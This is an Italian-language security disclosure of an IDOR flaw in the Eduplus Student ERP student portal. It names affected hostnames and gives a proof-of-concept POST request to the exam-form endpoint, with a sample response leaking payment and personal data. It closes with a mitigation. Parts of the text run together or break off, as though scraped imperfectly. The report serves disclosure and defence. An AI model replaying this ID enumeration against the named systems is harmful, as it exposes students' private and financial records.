
Rapporto dettagliato di ricerca sulle vulnerabilità riguardante un IDOR in Eduplus Student ERP, inclusa analisi tecnica, PoC, valutazione dell'impatto e raccomandazioni per la mitigazione.
Ricercatore: Vinay Sharma
Questo rapporto descrive una vulnerabilità di sicurezza ad alta gravità identificata nella piattaforma Eduplus Student ERP, in particolare nel portale dello studente (learnerapi.pceterp.in). L'applicazione presenta una Insecure Direct Object Reference (IDOR) Universale sull'endpoint di invio dei moduli d'esame, che consente a qualsiasi utente autenticato (studente) di recuperare i dati personali e finanziari sensibili di qualsiasi altro studente manipolando gli identificativi dei moduli.
La vulnerabilità consente la raccolta su larga scala dei dati degli studenti, inclusi i Dati Personali Identificativi (PII) e le tracce dettagliate di audit delle transazioni finanziarie.
learnerapi.pceterp.in, learner.zealerp.in, ecc.learner.despu.edu.inPOST /ExamForm/viewSubmitExamFormCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)La vulnerabilità risiede nell'endpoint viewSubmitExamForm. Il server si basa su due parametri forniti dal client per identificare il record da recuperare:
{"formid": "XXXXX"}Router-Path: /view-pcu-exam-form/XXXXXformid richiesto. Iterando attraverso gli ID numerici, un attaccante può accedere ai record di altri studenti.Una richiesta POST standard all'endpoint vulnerabile con un formid modificato restituisce dati sensibili dello studente.
Richiesta:
POST /ExamForm/viewSubmitExamForm HTTP/2
Host: learnerapi.pceterp.in
Content-Type: application/json
Router-Path: /view-pcu-exam-form/28984
... (Intestazioni Autenticate) ...
{"formid":"28984"}
Risposta (Riepilogo dei Dati Divulgati):
{
"status": "200",
"examFormname": "B.Tech - Sem VI - Regular",
"receipt_no": "REC/2023/54321",
"feespaiddate": "2023-10-15",
"ispaymentdone": {
"username": "[email protected]",
"received_amount": "1500.0",
"updation_ip_address": "103.x.x.x",
"erp_transaction_id": "ERP_998877",
"bank_transaction_id": "BANK_ABC123",
"paymentgateway_transaction_id": "PG_XYZ789",
"learner": {
"id": "12345"
}
}
}





Caricamento di Idorpoc.mp4…
Lo sfruttamento riuscito di questa vulnerabilità consente di:
formid richiesto appartenga al learnerid associato alla sessione attiva. Non fidarsi mai dei parametri formid o Router-Path senza validazione rispetto al token di sessione autenticato.